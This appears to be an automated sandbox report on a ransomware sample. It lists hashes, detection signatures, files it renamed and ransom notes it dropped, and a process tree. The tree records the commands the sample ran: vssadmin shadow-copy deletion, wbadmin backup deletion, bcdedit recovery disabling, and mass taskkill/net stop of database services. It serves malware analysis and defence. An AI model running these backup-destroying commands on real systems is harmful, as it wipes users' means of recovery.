Analysis

max time kernel: 153s
max time network: 159s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-02-2024 17:56
Behavioral task behavioral1
Sample: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
Resource: win7-20240221-en

Behavioral task behavioral2
Sample: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
Resource: win10v2004-20240226-en
General

Target: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
Size: 332KB
MD5: 0d5ccd706f75461b3fb9c56bc87b5c6f
SHA1: 0c3755209682d5632a5fb20143ea7d93be5dc5e8
SHA256: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1
SHA512: 9288cdd355d9a6fab846fda6b46ea6c67ec706e089c02d9718661b754bb45be020e97bd48d7876d82a525dfaedc17f6c2303f03160932ea4d6e915f085714131
SSDEEP: 6144:aY196WTQqBfFrQlVCuzw/322A1StYDBF+FTKtkV:R96eVFryVHzw/3XOfvtk
Malware Config
Extracted
C:\odt\How_to_back_files.html
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description: PID 3376 created 3300 | pid: 3376 | process: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | procid_target: 25

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  pid 1096  bcdedit.exe
  pid 2948  bcdedit.exe

Renames multiple (343) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

pid / Process
  pid 3532  wbadmin.exe

pid / Process
  pid 4396  wbadmin.exe

Enumerates connected drives (3 TTPs, 23 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe:
  \??\L:  \??\Q:  \??\R:  \??\S:  \??\V:  \??\E:  \??\H:  \??\K:  \??\W:  \??\X:  \??\Z:  \??\G:
  \??\N:  \??\T:  \??\O:  \??\U:  \??\B:  \??\J:  \??\M:  \??\Y:  \??\A:  \??\I:  \??\P:

Drops file in Program Files directory (64 IoCs)
All entries by process c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe.
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak
  File created                  C:\Program Files\Java\jdk-1.8\jre\legal\javafx\How_to_back_files.html
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties
  File created                  C:\Program Files\Common Files\System\Ole DB\it-IT\How_to_back_files.html
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\jdk\icu.md
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
  File opened for modification  C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui
  File opened for modification  C:\Program Files\7-Zip\Lang\sa.txt
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_jpn.xml
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\en-US\TabTip.exe.mui
  File created                  C:\Program Files\Common Files\microsoft shared\ink\nl-NL\How_to_back_files.html
  File created                  C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\How_to_back_files.html
  File opened for modification  C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\gu.pak
  File created                  C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\How_to_back_files.html
  File opened for modification  C:\Program Files\7-Zip\Lang\mr.txt
  File created                  C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\How_to_back_files.html
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\jdk\colorimaging.md
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md
  File opened for modification  C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.cpl
  File opened for modification  C:\Program Files\Internet Explorer\en-US\ieinstal.exe.mui
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected]
  File created                  C:\Program Files\Common Files\System\msadc\fr-FR\How_to_back_files.html
  File opened for modification  C:\Program Files\ImportStart.MTS
  File created                  C:\Program Files\Common Files\microsoft shared\ink\pt-BR\How_to_back_files.html
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\tr-TR\tipresx.dll.mui
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml
  File created                  C:\Program Files\Common Files\microsoft shared\ink\fr-CA\How_to_back_files.html
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols.xml
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_100_percent.pak
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md
  File opened for modification  C:\Program Files\7-Zip\Lang\sr-spl.txt
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\es-ES\mshwLatin.dll.mui
  File created                  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\How_to_back_files.html
  File created                  C:\Program Files\Internet Explorer\uk-UA\How_to_back_files.html
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\en-US\micaut.dll.mui
  File opened for modification  C:\Program Files\7-Zip\Lang\ku.txt
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sr.pak
  File opened for modification  C:\Program Files\7-Zip\Lang\hu.txt
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\ja-JP\ShapeCollector.exe.mui
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bg.pak
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip
  File opened for modification  C:\Program Files\7-Zip\Lang\ta.txt
  File created                  C:\Program Files\Common Files\microsoft shared\ink\bg-BG\How_to_back_files.html
  File opened for modification  C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\pt-BR.pak
  File created                  C:\Program Files\Java\jdk-1.8\jre\bin\server\How_to_back_files.html
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\javafx\icu_web.md
  File created                  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\How_to_back_files.html
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\icudtl.dat
  File opened for modification  C:\Program Files\7-Zip\Lang\es.txt
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\lv-LV\tipresx.dll.mui
  File created                  C:\Program Files\Common Files\System\en-US\How_to_back_files.html
  File opened for modification  C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui
  File created                  C:\Program Files\Common Files\microsoft shared\ink\hu-HU\How_to_back_files.html
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sk.pak
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md
  File created                  C:\Program Files\Common Files\DESIGNER\How_to_back_files.html
  File created                  C:\Program Files\dotnet\swidtag\How_to_back_files.html

Drops file in Windows directory (3 IoCs)
  File opened for modification  C:\Windows\Logs\WindowsBackup\WBEngine.3.etl  wbadmin.exe
  File opened for modification  C:\Windows\Logs\WindowsBackup\WBEngine.2.etl  wbadmin.exe
  File opened for modification  C:\Windows\Logs\WindowsBackup\WBEngine.1.etl  wbadmin.exe

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid 1468  vssadmin.exe

Kills process with taskkill (14 IoCs)
  taskkill.exe pids: 4612, 1316, 3864, 1036, 3156, 4404, 1472, 996, 2816, 880, 1316, 1004, 4356, 1684

Runs net.exe

Suspicious behavior: EnumeratesProcesses (32 IoCs)
  pid 3376  c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe  (32 identical entries)

Suspicious use of AdjustPrivilegeToken (36 IoCs)
  Token: SeDebugPrivilege  taskkill.exe, pids 3864, 1472, 1316, 996, 2816, 1004, 880, 1036, 3156, 4612, 4356, 1316
  WMIC.exe (pid 3960) tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  vssvc.exe (pid 2716) tokens: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
Columns: description | pid | Process | procid_target; repeated identical rows are shown once with a count.
  PID 3376 wrote to memory of 1096 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 96   (x3)
  PID 1096 wrote to memory of 4924 | 1096 | cmd.exe | 98   (x2)
  PID 3376 wrote to memory of 1884 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 99   (x3)
  PID 1884 wrote to memory of 4796 | 1884 | cmd.exe | 101  (x2)
  PID 4796 wrote to memory of 3864 | 4796 | cmd.exe | 102  (x2)
  PID 3376 wrote to memory of 2688 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 104  (x3)
  PID 2688 wrote to memory of 3832 | 2688 | cmd.exe | 106  (x2)
  PID 3832 wrote to memory of 4404 | 3832 | cmd.exe | 107  (x2)
  PID 3376 wrote to memory of 3624 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 108  (x3)
  PID 3624 wrote to memory of 2356 | 3624 | cmd.exe | 110  (x2)
  PID 2356 wrote to memory of 1472 | 2356 | cmd.exe | 111  (x2)
  PID 3376 wrote to memory of 212  | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 112  (x3)
  PID 212 wrote to memory of 3088  | 212  | cmd.exe | 114  (x2)
  PID 3088 wrote to memory of 1316 | 3088 | cmd.exe | 115  (x2)
  PID 3376 wrote to memory of 1684 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 116  (x3)
  PID 1684 wrote to memory of 3400 | 1684 | cmd.exe | 118  (x2)
  PID 3400 wrote to memory of 996  | 3400 | cmd.exe | 119  (x2)
  PID 3376 wrote to memory of 3276 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 120  (x3)
  PID 3276 wrote to memory of 4292 | 3276 | cmd.exe | 122  (x2)
  PID 4292 wrote to memory of 2816 | 4292 | cmd.exe | 123  (x2)
  PID 3376 wrote to memory of 4524 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 124  (x3)
  PID 4524 wrote to memory of 3500 | 4524 | cmd.exe | 126  (x2)
  PID 3500 wrote to memory of 1004 | 3500 | cmd.exe | 127  (x2)
  PID 3376 wrote to memory of 2420 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 128  (x3)
  PID 2420 wrote to memory of 4488 | 2420 | cmd.exe | 130  (x2)
  PID 4488 wrote to memory of 880  | 4488 | cmd.exe | 131  (x2)
  PID 3376 wrote to memory of 4348 | 3376 | c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe | 132  (x3)

System policy modification (1 TTP, 4 IoCs)
All entries by process c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe.
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

Each entry shows the image path, then its command line and PID; indentation gives the depth in the process tree. Signatures raised by that process follow as bullets.

C:\Windows\Explorer.EXE
  cmd: C:\Windows\Explorer.EXE
  PID: 3300

  C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe"
    PID: 3376
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - System policy modification

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
      PID: 1096
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
        PID: 4924

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      PID: 1884
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        PID: 4796
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im sqlbrowser.exe
          PID: 3864
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      PID: 2688
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
        PID: 3832
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im sql writer.exe
          PID: 4404
          - Kills process with taskkill

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      PID: 3624
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
        PID: 2356
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im sqlserv.exe
          PID: 1472
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      PID: 212
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        PID: 3088
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im msmdsrv.exe
          PID: 1316
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      PID: 1684
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        PID: 3400
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im MsDtsSrvr.exe
          PID: 996
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      PID: 3276
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        PID: 4292
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im sqlceip.exe
          PID: 2816
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      PID: 4524
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        PID: 3500
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im fdlauncher.exe
          PID: 1004
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      PID: 2420
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        PID: 4488
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im Ssms.exe
          PID: 880
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      PID: 4348

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        PID: 2260

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im SQLAGENT.EXE
          PID: 1036
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      PID: 4536

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        PID: 768

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im fdhost.exe
          PID: 3156
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      PID: 2668

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        PID: 3904

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im ReportingServicesService.exe
          PID: 4612
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      PID: 3076

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        PID: 3092

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im msftesql.exe
          PID: 4356
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      PID: 4412

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        PID: 4196

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -im pg_ctl.exe
          PID: 1316
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      PID: 3836

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
        PID: 2220

        C:\Windows\system32\taskkill.exe
          cmd: taskkill -f -impostgres.exe
          PID: 1684
          - Kills process with taskkill

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      PID: 4824

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        PID: 4344

        C:\Windows\system32\net.exe
          cmd: net stop MSSQLServerADHelper100
          PID: 3276

          C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 stop MSSQLServerADHelper100
            PID: 4424

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
      PID: 2284

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
        PID: 1484

        C:\Windows\system32\net.exe
          cmd: net stop MSSQL$ISARS
          PID: 4132

          C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 stop MSSQL$ISARS
            PID: 3228

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
      PID: 4516

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
        PID: 332

        C:\Windows\system32\net.exe
          cmd: net stop MSSQL$MSFW
          PID: 2932

          C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 stop MSSQL$MSFW
            PID: 2084

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      PID: 2260

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        PID: 2948

        C:\Windows\system32\net.exe
          cmd: net stop SQLAgent$ISARS
          PID: 2480

          C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 stop SQLAgent$ISARS
            PID: 2980

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      PID: 3124

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        PID: 3156

        C:\Windows\system32\net.exe
          cmd: net stop SQLAgent$MSFW
          PID: 4972

          C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 stop SQLAgent$MSFW
            PID: 1956

    C:\Windows\SysWOW64\cmd.exe
      cmd: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
      PID: 2916

      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
        PID: 4900

        C:\Windows\system32\net.exe
          cmd: net stop SQLBrowser
          PID: 3332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵PID:1132
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS3⤵PID:1548
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS4⤵PID:4604
-
C:\Windows\system32\net.exenet stop REportServer$ISARS5⤵PID:3840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop REportServer$ISARS6⤵PID:4208
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵PID:1100
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵PID:456
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵PID:972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵PID:1556
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵PID:996
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵PID:3104
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:1468
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵PID:3308
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵PID:4292
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
PID:3532
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest3⤵PID:32
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest4⤵PID:4692
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTABACKUP -deleteOldest5⤵PID:4836
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet3⤵PID:2220
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet4⤵PID:3836
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersion:0 -quiet5⤵
- Deletes system backups
- Drops file in Windows directory
PID:4396
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No3⤵PID:4532
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No4⤵PID:3396
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoverynabled No5⤵
- Modifies boot configuration data using bcdedit
PID:1096
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵PID:3564
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵PID:740
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:2948
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵PID:2884
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵PID:4496
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe\\?\C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -network2⤵
- System policy modification
PID:3292 -
